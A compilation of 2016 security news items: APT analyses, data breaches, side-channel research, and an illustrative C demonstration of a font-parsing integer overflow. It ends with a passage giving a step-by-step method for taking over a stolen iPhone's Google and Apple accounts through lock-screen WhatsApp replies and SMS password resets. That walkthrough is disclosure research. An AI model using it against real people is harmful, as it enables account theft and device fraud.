“FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.” reads a blog post published on Thursday by Kaspersky.

Another peculiarity of the group is its use of Windows Management Instrumentation (WMI) for persistence.

The malicious code used by the APT is hard to detect; the experts from Kaspersky highlighted that its payloads run directly in memory.

According to the experts, the FruityArmor APT group exploits the zero-day flaw for privilege escalation, which, combined with browser exploits, allows the attackers to escape the browser sandbox.

“To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine.” reads the blog post.

“In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.”

For further details, take a look at the Kaspersky analysis.

Weebly data breach affected more than 43 million customers
21.10.2016 securityaffairs Crime

Weebly, a San Francisco-based drag-and-drop website creator, will start sending notification letters to all of its customers due to a data breach.
Another data breach is in the headlines: Weebly and Foursquare are the latest victims of massive data breaches.

According to data breach notification site LeakedSource, hackers compromised the details of over 43 million users.

“Well known San-Francisco based “drag-n-drop” website creator Weebly.com had information on 43,430,316 users leaked from its main database in February of 2016. This database was provided to us by an anonymous source.” reads the blog post published by LeakedSource.
“Each record in this mega breach contains a username, email address, password, and IP address.”

The company confirmed the data breach and informed LeakedSource that it has started notifying affected customers and initiated a password reset process.

LeakedSource also provided details of the cyber attack, which seems to date back to February 2016, confirming the massive impact of the incident.

“This mega breach affects not only tens of millions of users but tens of millions of websites and with Weebly being one of the most popular hosting platforms in the world, this breach could have been far more disastrous in the wrong hands had they not strongly hashed passwords.”

Weebly stored passwords with uniquely salted bcrypt hashing, making it hard for attackers to obtain users’ actual passwords.

“Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers,” the company said.

“At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident.”

Weebly is the latest company to join the list of massive data breaches recently revealed, a long list that includes IT giants like LinkedIn, MySpace, VK.com, Dropbox, and Yahoo.

Massive ATM Hack Hits 3.2 Million Indian Debit Cards — Change Your PIN Now!
20.10.2016 thehackernews Hacking
India is undergoing its biggest data breach to date, with as many as 3.2 Million debit card details reportedly stolen from multiple banks and financial platforms.
The massive financial breach has hit India's biggest banks, including State Bank of India (SBI), HDFC Bank, Yes Bank, ICICI Bank and Axis, and customers are advised to change their ATM PIN immediately.
Hackers allegedly used malware to compromise the Hitachi Payment Services platform — which is used to power the country's ATMs, point-of-sale (PoS) machines and other financial transactions — and stole details of 3.2 Million debit cards, reports The Economic Times.
Of the 3.2 Million debit cards, 2.6 Million are powered by Visa or Mastercard and the remaining 600,000 run on India’s own RuPay platform.
Hacked Debit Cards Reportedly Used in China
It is not yet clear who is behind the cyber attack, but the report adds that a number of affected customers have observed unauthorized transactions made by their cards in various locations in China.
Some banks, including the country's biggest lender SBI, have announced that they'll replace compromised debit cards, while other banks, including HDFC Bank, have urged their customers to change their ATM PINs and avoid using ATMs of other banks.
The extent of the damage due to the breach also depends on the type of card customers are using.
Cards that use a magnetic stripe transmit your account number and secret PIN to merchants in a way that could make it easy for fraudsters to hack them, making these cards easier to clone.
Banks using EMV (Europay, MasterCard, and Visa) chip-equipped cards (better known as Chip-and-PIN cards), by contrast, store your data in encrypted form and only transmit a unique code (a one-time-use token) for every transaction, making these cards more secure and a lot harder to clone.
SBI Blocks and will Re-Issue 600,000 Debit Cards
SBI has blocked affected debit cards and will re-issue over 600,000 cards. Here's what SBI CTO Shiv Kumar Bhasin told the publication:
"It's a security breach, but not in our bank's systems. Many other banks also have this breach—right now and since a long time. A few ATMs have been affected by malware. When people use their card on infected switches or ATMs, there is a high probability that their data will be compromised."
Mastercard also denied that its systems were breached, issuing the following statement:
"We're aware of the data compromise event. To be clear, Mastercard's own systems have not been breached. At Mastercard, safety and security of payments are a top priority for us and we're working on the investigations with the regulators, issuers, acquirers, global and local law enforcement agencies and third party payment networks to assess the current situation."
Meanwhile, the Payments Council of India has ordered a forensic audit on the Indian bank servers to measure the damage and investigate the origin of the cyber attack. Bengaluru-based payment and security specialist SISA will conduct the forensic audit.

Windows zero-day exploit used in targeted attacks by FruityArmor APT
20.10.2016 Kaspersky Vulnerebility
A few days ago, Microsoft published the “critical” MS16-120 security bulletin with fixes for vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync.

One of the vulnerabilities – CVE-2016-3393 – was reported to Microsoft by Kaspersky Lab in September 2016.

Here’s a bit of background on how this zero-day was discovered. A few months ago, we deployed a new set of technologies in our products to identify and block zero-day attacks. These technologies proved their effectiveness earlier this year, when we discovered two Adobe Flash zero-day exploits – CVE-2016-1010 and CVE-2016-4171. Two Windows EoP exploits have also been found with the help of this technology. One is CVE-2016-0165. The other is CVE-2016-3393.

Like most zero-day exploits found in the wild today, CVE-2016-3393 is used by an APT group we call FruityArmor. FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.

In this report we describe the vulnerability that was used by this group to elevate privileges on a victim’s machine. Please keep in mind that we will not be publishing all the details about this vulnerability because of the risk that other threat actors may use them in their attacks.

Attack chain description
To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine. Most of the recent attacks we’ve seen that rely on a browser exploit are combined with an EoP exploit, which allows for a reliable sandbox escape.

In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module that runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module loads the exploit font directly from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second-stage payload is executed with higher privileges to run PowerShell with a meterpreter-style script that connects to the C&C.

EOP zero-day details
The vulnerability is located in the cjComputeGLYPHSET_MSFT_GENERAL function from the Win32k.sys system module. This function parses the cmap table and fills internal structures. The CMAP structure looks like this:


The most interesting parts of this structure are two arrays – endCount and startCount. The exploit’s cmap table contains the following segments:


To compute how much memory to allocate to internal structures, the function executes this code:


After computing this number, the function allocates memory for structures in the following way:


The problem is that if the count is computed over the entire table, an integer overflow occurs and the cnt variable ends up with an incorrect value.

In the kernel, we see the following:


The code allocates memory for only 0x18 InternalStruct entries, but then loops over the entire segment range (a value extracted directly from the file):


Using the cmap table, the v44 variable (the index) can be controlled and, as a result, memory corruption occurs. To achieve it, the attacker does the following:

Trigger an integer overflow in win32k!cjComputeGLYPHSET_MSFT_GENERAL.
Craft specific segment ranges in the font file to reach the memory of interest.
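As an added illustration (not Kaspersky’s analysis code and not the actual win32k arithmetic, which this article deliberately withholds), the C program below shows the class of bug described above: the per-segment character ranges of a cmap table are summed into a fixed-width counter that sizes an allocation, while the processing loop walks the untruncated ranges. The segment table, the 16-bit accumulator width and all function names are constructed for the example; the hardened variant validates each segment and bounds the total before anything is allocated.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed cmap format-4-style segment table (parallel startCount/endCount
 * arrays, inclusive bounds).  Two segments cover all of 0x0000..0xFFFF and a
 * third covers 24 code points, chosen so that a 16-bit running total wraps to
 * 0x18.  This is NOT the font used in the attack; it is an illustrative table. */
#define SEG_COUNT 3
static const uint16_t SAMPLE_START[SEG_COUNT] = { 0x0000, 0x0000, 0x0000 };
static const uint16_t SAMPLE_END[SEG_COUNT]   = { 0xFFFF, 0xFFFF, 0x0017 };

/* A well-formed table for comparison: printable ASCII and Latin-1 supplement. */
static const uint16_t ASCII_START[2] = { 0x0020, 0x00A0 };
static const uint16_t ASCII_END[2]   = { 0x007E, 0x00FF };

/* Unchecked counting (assumed 16-bit accumulator, an assumption of this example).
 * Each range size is computed correctly (65536, 65536, 24) but the running
 * total is silently truncated on every addition. */
uint16_t count_entries_unchecked(const uint16_t *start, const uint16_t *end,
                                 size_t segs) {
    uint16_t cnt = 0;
    for (size_t i = 0; i < segs; i++) {
        uint32_t range = (uint32_t)end[i] - start[i] + 1u;
        cnt = (uint16_t)(cnt + range);   /* wraps: 131096 -> 0x18 */
    }
    return cnt;
}

/* Number of entries the processing loop actually touches: the sum of all
 * segment ranges without truncation.  When this exceeds the allocated count
 * the loop writes past the buffer. */
uint32_t entries_visited(const uint16_t *start, const uint16_t *end, size_t segs) {
    uint32_t total = 0;
    for (size_t i = 0; i < segs; i++)
        total += (uint32_t)end[i] - start[i] + 1u;
    return total;
}

/* Hardened counting: rejects inverted segments and any total above
 * max_entries.  Because cnt never exceeds max_entries, max_entries - cnt
 * cannot underflow and the comparison also rules out wrap-around. */
bool count_entries_checked(const uint16_t *start, const uint16_t *end,
                           size_t segs, uint32_t max_entries, uint32_t *out) {
    uint32_t cnt = 0;
    for (size_t i = 0; i < segs; i++) {
        if (end[i] < start[i])           /* inverted range: malformed table */
            return false;
        uint32_t range = (uint32_t)end[i] - start[i] + 1u;
        if (range > max_entries - cnt)   /* would exceed the policy limit */
            return false;
        cnt += range;
    }
    *out = cnt;
    return true;
}

/* Convenience wrapper: a format-4 subtable addresses 16-bit code points, so a
 * total above 65536 entries necessarily means overlapping segments.  Returns
 * the entry count, or 0 if the table is rejected. */
uint32_t checked_total(const uint16_t *start, const uint16_t *end, size_t segs) {
    uint32_t cnt = 0;
    return count_entries_checked(start, end, segs, 0x10000u, &cnt) ? cnt : 0u;
}

int main(void) {
    printf("unchecked: allocate for %u entries, loop touches %u\n",
           count_entries_unchecked(SAMPLE_START, SAMPLE_END, SEG_COUNT),
           entries_visited(SAMPLE_START, SAMPLE_END, SEG_COUNT));
    printf("checked: sample table -> %u (0 = rejected), ascii table -> %u\n",
           checked_total(SAMPLE_START, SAMPLE_END, SEG_COUNT),
           checked_total(ASCII_START, ASCII_END, 2));
    return 0;
}
```

The hardened counter rejects the constructed table at the second segment, before any allocation is sized, so the allocation and the loop can never disagree; the well-formed table yields 191 entries. The same shape of check (validate each range, accumulate in a wide type, enforce an upper bound derived from the format) applies to any parser that sizes a buffer from attacker-controlled counts.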
What about Windows 10? As most of you know, font processing in Windows 10 is performed in a special user-mode process with restricted privileges. This is a very good solution, but the code has the same bug in its TTF processing.


As a result, if you load or open this font exploit on Windows 10, you will see fontdrvhost.exe crash:


Kaspersky Lab detects this exploit as:

We would like to thank Microsoft for their swift response in closing this security hole.

* More information about the FruityArmor APT group is available to customers of Kaspersky Intelligence Services. Contact: intelreports@kaspersky.com

Experts devised a method to capture keystrokes during Skype calls
20.10.2016 securityaffairs Security

A group of security experts discovered that the Microsoft Skype messaging service exposes user keystrokes during a conversation.
A group of researchers from the University of California Irvine (UCI) and two Italian universities discovered that the popular Skype messaging service exposes user keystrokes during a call.

The researchers have devised a method to record the acoustic emanations of computer keyboards during a Skype call and reconstruct the typed text from them.


The method relies on profiling the user’s typing style and does not require proximity to the victim in order to capture keystrokes.

The experts devised a new keyboard acoustic eavesdropping attack based on Voice-over-IP (VoIP).

The VoIP software picks up the acoustic emanations of pressed keys and transmits them to the other parties on the VoIP call.

The attack is possible because each keyboard model emits distinct sounds, as do the different keys on the same keyboard. The technique presented by the researchers can discriminate these sounds and recover the typed text with an accuracy that depends on how well the user’s typing style is known.

Clearly, this attack poses a serious threat to the users’ privacy.

According to the researchers, Skype conveys enough audio information to allow attackers to reconstruct the victim’s input with an accuracy of 91.7% when the target’s typing style is known.

“In fact, we show that very popular VoIP software (Skype) conveys enough audio information to reconstruct the victim’s input – keystrokes typed on the remote keyboard.” states the paper published by the experts. “In particular, our results demonstrate that, given some knowledge on the victim’s typing style and the keyboard, the attacker attains top-5 accuracy of 91.7% in guessing a random key pressed by the victim. (The accuracy goes down to still alarming 41.89% if the attacker is oblivious to both the typing style and the keyboard).”

The researchers highlighted that the attack is not effective when the victim uses a touchscreen or a keypad.

The real innovation of this technique is that VoIP removes the need for physical proximity to the victim that other keyboard eavesdropping techniques require.

Flaw in Intel CPUs could allow to bypass ASLR defense
20.10.2016 securityaffairs Vulnerability

A flaw in Intel chips could be exploited to launch a side-channel attack that allows attackers to bypass the protection mechanism known as ASLR.
A vulnerability in Intel’s Haswell CPUs can be exploited to bypass address space layout randomization (ASLR), an anti-exploitation technology implemented by all major operating systems.

ASLR is a security mechanism used by operating systems to randomize the memory addresses of key areas of a process; it makes it hard for attackers to find the memory location where their malicious code would need to be placed or where existing code resides.

ASLR is particularly effective against stack and heap overflows, and it can prevent arbitrary code execution triggered by other buffer overflow vulnerabilities.

Three researchers from the State University of New York at Binghamton and the University of California, Riverside have devised a method to exploit the flaw. The technique was presented this week at the 49th annual IEEE/ACM International Symposium on Microarchitecture in Taipei.

The researchers exploited the branch target buffer (BTB) to leak ASLR addresses.

The BTB is a caching mechanism used by the CPU’s branch target predictor to improve performance. The trio discovered a way to trigger BTB collisions between different user processes, or between a process and the kernel.

“The BTB stores target addresses of recently executed branch instructions, so that those addresses can be obtained directly from a BTB lookup to fetch instructions starting at the target in the next cycle.” states the paper published by the experts. “Since the BTB is shared by several applications executing on the same core, information leakage from one application to another through the BTB side-channel is possible.”

In order to create a BTB-based side channel, three conditions must be satisfied.

One application has to fill a BTB entry by executing a branch instruction.
The execution time of another application running on the same core must be affected by the state of the BTB. This happens when both applications use the same BTB entry.
The second application must be able to detect the impact on its execution by performing time measurements.
“We call the BTB collisions created between two processes executing in the same protection domain (e.g. two user-level processes) as Same-Domain Collisions (SDC).” continues the paper.
The researchers were able to successfully run the attack on a computer equipped with an Intel Haswell microarchitecture CPU and running a Linux kernel version 4.5.

The researchers were able to recover the kernel’s ASLR-randomized addresses using BTB collisions in around 60 milliseconds.

The three researchers described software- and hardware-based mitigations that could prevent BTB-based side-channel attacks in the future or harden current ASLR implementations.

BTB side-channel attacks are not new; however, exploits that bypass ASLR usually rely on a second, memory-disclosure vulnerability in the targeted OS or application. The method presented by the researchers is notable because attackers do not need to exploit another flaw to carry out the attack.

Intel did not comment on the attack.

Breaking — Russian Hacker Responsible for LinkedIn Data Breach Arrested by FBI
20.10.2016 thehackernews Crime
The alleged Russian hacker arrested by the FBI in collaboration with the Czech police is none other than the hacker allegedly responsible for the massive 2012 data breach at LinkedIn, which affected nearly 117 million user accounts.
Yevgeniy N., a 29-year-old Russian hacker, was arrested in Prague on October 5 on suspicion of participating in cyber-attacks against the United States, according to Reuters.
Earlier it was suspected that the hacker could have been involved in the hacking of the Democratic National Committee (DNC) or its presidential candidate Hillary Clinton, intended to influence the presidential election.
However, the latest statement released by LinkedIn suggests that the arrest was related to the 2012 data breach at the social network, which exposed the emails and hashed passwords of nearly 117 million users.
"We are thankful for the hard work and dedication of the FBI in its efforts to locate and capture the parties believed to be responsible for this criminal activity," LinkedIn said in a statement.
"Following the 2012 breach of LinkedIn member information, we have remained actively involved with the FBI's case to pursue those responsible."
Earlier this year, a hacker under the nickname "Peace" put up for sale what he claimed to be a database of 167 million emails and hashed passwords belonging to LinkedIn users, including 117 million already-cracked passwords.
But it is still unclear whether the arrested hacker is the same one who was selling the LinkedIn data dump on the dark web market a few months ago.
Watch Video of Hacker's Arrest:

But if it turns out to be the same person, it would be a jackpot for the FBI, because 'Peace' is also the hacker responsible for selling data dumps from MySpace, Tumblr, VK.com, and Yahoo! on the dark web marketplace.
Czech police said that a court will decide on the hacker's extradition to the U.S., where he faces charges for his hacking-related crimes.
We will update the story as soon as we get official confirmation from the U.S. feds.

Police Scan 117 Million Driving Licence Photos for Face Recognition Database
19.10.2016 thehackernews BigBrothers
Your driver's license photo could be scarier than it actually looks — Well, here's why:
With the help of state driver's license data, U.S. law enforcement agencies have created a huge face-recognition database of more than 117 million American adults that is regularly scanned in the course of police investigations.
What's even worse? Most of the people scanned by police without their knowledge are law-abiding citizens.
According to a 150-page study published Tuesday by the Center for Privacy & Technology at the Georgetown University, ID photographs of more than 117 Million adult US citizens — that's about half of the US population — are now part of the "Perpetual Line-up," which can be searched using facial-recognition software.
In the past few years, facial recognition technology has improved enormously. Even big technology companies like Facebook have developed facial recognition software so powerful that it can identify you in photos even when your face is hidden.
So, why would law enforcement be left behind?
Currently, at least 26 states reportedly allow their law enforcement agencies to run face recognition searches against their driver's license databases, while dozens of local law enforcement agencies are using commercial software to scan images captured by ATM cameras and other surveillance devices.
This clearly indicates that millions of law-abiding American citizens are potentially being pulled into the dragnet, raising legal and privacy concerns about the use of this facial recognition software, the report explains.
The report calls the use of facial recognition systems "highly problematic" because of their potential to identify and monitor innocent citizens. Police departments usually keep fingerprint and DNA databases, but those are typically collected from criminals or people who have been arrested, not from the general public.
"Innocent people don't belong in criminal databases," said Alvaro Bedoya, the co-author of the report. "By using face recognition to scan the faces on 26 states' driver's license and ID photos, police and the FBI have basically enrolled half of all adults in a massive virtual line-up. This has never been done for fingerprints or DNA. It's uncharted and frankly dangerous territory."
Another area of concern is that out of 52 agencies that use or have used face recognition, only one — Ohio's Bureau of Criminal Investigation — has a policy in place to prevent its officers from using the software to track religious, political or other free speech activities.
Accuracy is also a strong concern, because facial recognition is far from perfect: one leading provider of face-scanning tools says its reliability rating is only 95 percent.
Meanwhile, facial recognition technology is reportedly less accurate when used to identify black people, women and those aged 18 to 30.
"An accurate algorithm correctly identifies a face in an ATM photo and leads police to a robber's door," the report suggests. "An inaccurate algorithm sends them to the wrong house — and could send an innocent person to jail."
The report also describes how the facial recognition technology is spreading rapidly and is almost entirely unregulated.
The findings argue the First Amendment is meant to protect "our right to express ourselves anonymously," and warn that police use of face recognition "to continuously identify anyone on the street—without individualized suspicion—could chill our basic freedoms of expression and association, particularly when face recognition is used at political protests."
In response to this report, over 50 civil liberties groups, including the American Civil Liberties Union (ACLU), delivered a letter to the Department of Justice's Civil Rights Division Tuesday asking it to investigate the expanding use of face recognition technology around the country by police.
Using facial recognition technology, "Police are free to identify and potentially track anyone even if they have no evidence that that person has done anything wrong," says ACLU's legislative counsel Neema Singh Guliani. "We do not expect that the police can identify us when we're walking into a mosque, attending an AA meeting, or when we are seeking help at a domestic violence shelter."
The routine, unsupervised use of face recognition systems threatens the privacy and civil liberties of millions, especially immigrants and people of color, according to the dozens of signatories.
For in-depth information, you can head on to the report [PDF], titled "The Perpetual Line-up: Unregulated Police Face Recognition in America."

SQL Injection zero-day in component ja-k2-filter-and-search of Joomla
19.10.2016 securityaffairs Vulnerability
Information Security experts have discovered an SQL injection zero-day vulnerability in Joomla component ja-k2-filter-and-search.
Information security researchers Dimitrios Roussis and Evangelos Apostoloudis have discovered an SQL injection vulnerability in the component ja-k2-filter-and-search (https://www.joomlart.com/joomla/extensions/ja-k2-search) of Joomla, a popular open-source Content Management System (CMS).

This component is used on various Joomla sites. Using the sqlmap tool, a malicious user can gain access to the website database, in some cases revealing very critical or sensitive data.

This vulnerability has not yet been detected or published on any international website. In addition, the component developer has not been informed of this critical issue, so the well-known vulnerability databases have not been updated either. Therefore this vulnerability is considered a zero-day.


Any Joomla website using this component can be checked for the vulnerability with the following request.


As a result, the following error message is displayed, proving the presence of the vulnerability.


Using sqlmap with the given URL, it is evident that a dump of the database can be obtained.

List of Vulnerable Sites
Below is the original post, in Greek, published by SecNews.gr.


Oops, the Trump Organization also uses insecure e-mail servers
19.10.2016 securityaffairs Security
According to a security researcher, the Trump Organization’s mail servers run on an outdated version of Microsoft Windows Server.
Hillary Clinton has been in the eye of the storm over the handling of her private email server, and Trump has used the case to attack his rival.

By an irony of fate, we are now discussing problems with the email servers of Trump’s own organization. According to security researcher Kevin Beaumont, the Trump Organization’s mail servers run Microsoft Windows Server 2003 with Internet Information Server 6, which Microsoft no longer supports. The researcher also found that the servers are configured with minimal security.

What does it mean?

Simply put, they are an easy target for hackers, who could gain access to the organization’s e-mail servers.

Kevin Beaumont (@GossiTheDog), 18 Oct 2016:
"Quick update on Trump corp email servers - all internet accessible, single factor auth, no MDM, Win2003, no security patching."
Beaumont also discovered the organization’s web email access page. He explained that, until yesterday morning, the Trump Organization allowed Outlook Web Access logins from webmail.trumporg.com.


According to Sean Gallagher of Ars, the e-mail access page at webmail.trumporg.com displays the header for Microsoft Exchange Outlook Web Access (OWA). The HTML source of the page reveals that the site runs an outdated application, the March 2015 build of Microsoft Exchange 2007 (SP3 RU16), a version known to be affected by many security issues.


Beaumont pointed out that the email service doesn’t use two-factor authentication.

Below is the comment a spokesperson for the Trump Organization sent by email to the Motherboard website; it seems to downplay the problem.

“The Trump Organization deploys best in class firewall and anti-vulnerability technology with constant 24/7 monitoring. Our infrastructure is vast and leverages multiple platforms which are consistently monitored and upgraded using current cyber security best practices.”

Political Cyberattacks: Senior Turkish Government Officials Affected by Advanced Malware
19.10.2016 securityaffairs Virus

Experts at ElevenPaths, Telefonica’s cyber security unit, provided further details on political cyberattacks that leverage advanced malware.
On 19 July at 11pm Ankara time, Wikileaks published the first emails taken from the Turkish AKP. The organization led by Julian Assange, in line with its policy on the publication of secret information, also released the attachments, thereby spreading the malware contained in the emails.
However, many aspects of these attacks are still unknown, as ElevenPaths, Telefonica’s cyber security unit, states in its recent report analyzing the malware samples and their malicious content.

The Infection Vector

One of the requirements any attacker must handle is access to an infrastructure that allows them to keep control of infected systems without being detected. In this case, analysis of the source IP addresses of the compromised emails showed that the attackers leveraged vulnerable mail server configurations to maximize their chances of success. This allowed them to use up to three different social engineering techniques aimed at ensuring that each recipient opened the attached malicious files:

Impersonating AKP email accounts with the domain org.tr.
Using organization administration usernames as senders.
Adopting email accounts with domains that appeared to belong to reliable organizations such as hosting companies, operators, or other mail services.
The 2067 IP addresses that served as sources of the malicious emails, distributed worldwide, included web servers, residential ADSL connections and mail servers. The large number of IP addresses used, their varied types and their wide geographic spread were key to preserving the attackers’ anonymity.

Types of Malware used in the political cyberattacks

Mainly, downloaders (programs or scripts used in the first phase of infection, responsible for downloading the malicious file) were found. These downloaders fetched ransomware and banking Trojans linked to massive campaigns run by organized cybercrime syndicates for purely monetary purposes. However, the most important finding of the research was the use of backdoor Trojans, which are usually associated with information theft and with attacks that may include lateral movement or other techniques associated with Advanced Persistent Threats.

After analyzing all the malicious attachments, several senior Turkish government officials were identified as targets of these Trojans, including Bekir Bozdağ (Ministry of Justice), Ömer Çelik (Minister of European Union Affairs), Nurettin Canikli (Deputy Prime Minister of Turkey) and Hüseyin Çelik (Minister of National Education).

Traditional Security Is Not Enough

Traditional security solutions are not enough to tackle very fresh samples that may be linked to targeted political cyberattacks, since such samples are unlikely to appear on blacklists. However, defense technology against advanced malware can answer threats that are highly likely to be deployed against all kinds of entities, both corporate and governmental.

In the words of Eugene H. Spafford, a well-known computer security expert, the only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards. And even then Spafford has his doubts. This case is another illustration of why it is always important to remain alert about our own defenses.

The ‘Sin’ Card: How criminals unlocked a stolen iPhone 6S
19.10.2016 securityaffairs Apple

Even if you have an iPhone 6S protected by a 6-digit passcode plus the Touch ID fingerprint, it is possible to unlock it.
1. Introduction

You have an iPhone 6S protected by a 6-digit passcode plus the Touch ID fingerprint, and you may think that nobody can unlock it without the code, right? Wrong! At least not according to the incident we analyzed this week at Morphus Labs.

An iPhone 6S, exactly as described in the previous paragraph, was stolen three days ago. The victim told us that, right after the incident, the criminals reset some of his online service passwords, such as his Apple ID, and contacted his bank pretending to be him in an attempt to retrieve the bank account’s passwords. Fortunately, they couldn’t reach the victim’s money, but how could they reset the Apple ID password from a locked device?

To better understand this scenario, we’ve collected more information about the victim:

a) Could it have been a targeted attack, i.e. was the thief focused on stealing that iPhone specifically? Could the thief have previously obtained the victim’s credentials using an e-mail phishing scam or something similar?

Probably not. According to the information we collected, the iPhone was the last item the thief asked the victim for.

b) Were any IDs or other documents with the victim’s information also stolen? It is important to understand whether the thief knew the victim’s name or e-mail address.

No. No ID or document with the victim’s name or any other information was stolen. They just asked for money and the iPhone.

c) How long did it take the victim to lock the iPhone and SIM card?

Approximately 2 hours after the theft.

d) Was the iPhone passcode “guessable”?

No. The 6-digit passcode wasn’t easily guessable and had no relation to the victim’s car plate number or to any personal information the thief might have had.

So, given this mysterious scenario, we decided to dive into the situation and understand how the victim’s iPhone was unlocked.

2. The timeline

We will now establish a timeline to organize the facts that happened on the afternoon of October 14th:

a) 14:00 – the theft occurred;

b) 16:03 – the victim activated Lost Mode on his iPhone and requested a remote erase through iCloud;

c) 16:28 – the victim’s Google Account password was changed;

d) 16:37 – the victim received an e-mail with a link to reset his Apple ID password;

e) 16:38 – a new e-mail informing the victim that the Apple ID password has been changed;

f) 16:43 – a new e-mail informing that the iPhone has been located;

g) 16:43 – a new e-mail informing that the iPhone was being erased;

So, as we can see, the victim’s Google and Apple account passwords were reset by the thief of the iPhone. As we all know, unlocking an iPhone without the proper credentials ranges from “hard” to “infeasible”. So, how did they do it?

Based on the facts that we established on the timeline, we started to work on some questions that might explain what happened:

1) To change a Google account password, you must at least provide your login, in other words your e-mail address. How might the e-mail address have been discovered?

Although the latest iOS version shows information and notifications even on a locked iPhone, in our simulations nothing appeared on the screen that could give the user’s Gmail address away;

2) Is there a way to discover the Apple ID from the device’s IMEI?

We searched the Web and found paid services that offer exactly that: “discover the Apple ID from a given IMEI”. But all of them state that this is not an online process; it could take 24 to 48 hours to get the information. This was not the case here: the whole process took around 2 hours.

3) Is there a way to discover a Gmail account based on the only information the criminal had, that is, the phone number?

We searched again and realized that Google offers a way to discover an e-mail address from some given data: the phone number associated with the account, a first name and a surname. As the phone number could easily be discovered in this scenario, finding the name and surname from that phone number might not be that hard. We’re starting to get somewhere…

3. The hypothesis simulation

So, we decided to follow that path and try to find the victim’s first name and surname from the thief’s perspective. This time, setting up our lab wasn’t a tough task. The victim bought a new iPhone 6S, configured it exactly the way the stolen one was, and gave it to us for the purpose of this research. That way, our scenario was as close as possible to the real one – including the same Google and Apple accounts.

3.1. Discovering the phone number

To obtain the phone number, we removed the SIM card from the iPhone and inserted it into another phone. As in the real scenario, no SIM PIN lock was in place. On the other phone, it was easy to identify the phone number.

3.2. Low-hanging fruit

Now, having the phone number, we followed the “low-hanging fruit” strategy first. We tried to find the victim’s name by entering his phone number into Internet search engines. Unfortunately, we didn’t find anything useful.

The next approach was to look for the phone number on Facebook. We know that if your phone number is associated with your profile, it is easy to find you by that number. Once again, nothing was found.

3.3. Thinking outside the box

Nothing from the low-hanging fruit, so it was time to think outside the box. Of course, there may be other ways to find a person’s name from a phone number, but we decided to persist a little longer with the information we had in our hands.

Then I remembered that I had recently changed my smartphone. While configuring the new one, my WhatsApp profile came with my photo – and I didn’t restore it from a backup. But I didn’t remember whether it came with my profile name, so I decided to see if this strategy could give us the victim’s name.

To do so, we removed the SIM card from the locked iPhone and inserted it into a second smartphone with WhatsApp installed. We followed the initial configuration, receiving the SMS and so on, but unfortunately (or fortunately), WhatsApp did not load the profile name. It brought only the profile photo and status.

Still related to WhatsApp, a second idea came up. You might remember that if you are in a WhatsApp group and receive a message from a person who is not in your contact list, their name appears right after their phone number (i.e. 9999-9999 ~Mike Arnold). So, if it were possible to send a message from that locked iPhone to a WhatsApp group, we could get the name associated with that profile.

3.4. (Whatsapp + Locked screen notification response) hacking

So, first we confirmed that the iPhone was configured to show WhatsApp notifications on the lock screen by sending it a single message. The message was shown as expected. The next step was to try to reply to that message from the locked iPhone. Using the “3D Touch” functionality, we were able to reply.

With the initial validation done, it was time to try the group message approach. We created a group and included the contact associated with the locked iPhone’s number. As no confirmation is required to be added to a new group, as soon as we did this a new message appeared on the locked iPhone screen informing it that it was now part of that group.

Because we had to create a contact for the iPhone’s number on the smartphone that created the group, we also had to include a third participant in the same group. This third participant had no contact data related to the iPhone’s number.

So, everything was set. We sent a message from one of the group participants. As expected, the message arrived on the locked iPhone screen. We replied to it from the locked iPhone and, as expected again, the message received by the third participant came tagged with the iPhone’s WhatsApp profile name. Stage completed.


The next and easiest step was to enter the three parameters we had discovered (phone number, first name and surname) into the Google form and get the e-mail address associated with that person. Stage completed.

3.4. Changing the Google account password

Now, let’s try to replay the password change made by the criminal. The next steps were:

– Enter Google login screen;

– Choose “forget my password” option;

– Insert any text on the “last password that you remember”;

– On the next screen, Google asks for the phone number associated with the account. Only part of the phone number is shown, but the last two digits led us to believe we were on the right track;

– After we entered the iPhone’s phone number, Google sent a code to the iPhone by SMS to be entered on the next screen;

– After doing that, Google offered us to input a new password for that account.

At that moment, we had reproduced the Google account password change by mimicking what the criminal did, and we started to think about how easy it can be, depending on how the account is set up, to change someone’s Google account password with only their phone or SIM card and their first and last name – even if you hold them for just a few minutes (or seconds).

3.5. Changing the Apple ID password

So, we continued following the incident timeline. In the next step we used the previously discovered Google e-mail address as the Apple ID login and chose the “forget password” option again. After that, a message was shown informing us that an e-mail had been sent to the Google account with a link to reset the password. The rest of this paragraph is easy to figure out. We succeeded in changing the password associated with that Apple ID.

3.6. Unlocking the “new” iPhone

Based on the facts that occurred in the real incident, it was time to remotely lock and erase the iPhone we were using to do the simulations.

I would bet these procedures are what gave the criminal access to the iPhone. After the erase process, the iPhone asks you to enter the Apple ID and password that were previously associated with that device. And, as we had that information, it was easy to access and configure the “new” iPhone from scratch.

4. Vulnerabilities and Recommendations

Well, of course we might have followed a different strategy compared to that of the criminals, but the result was the same – an iPhone unlocked without its credentials.

However, to achieve this result, there are some preconditions that we consider vulnerabilities and that should be avoided:

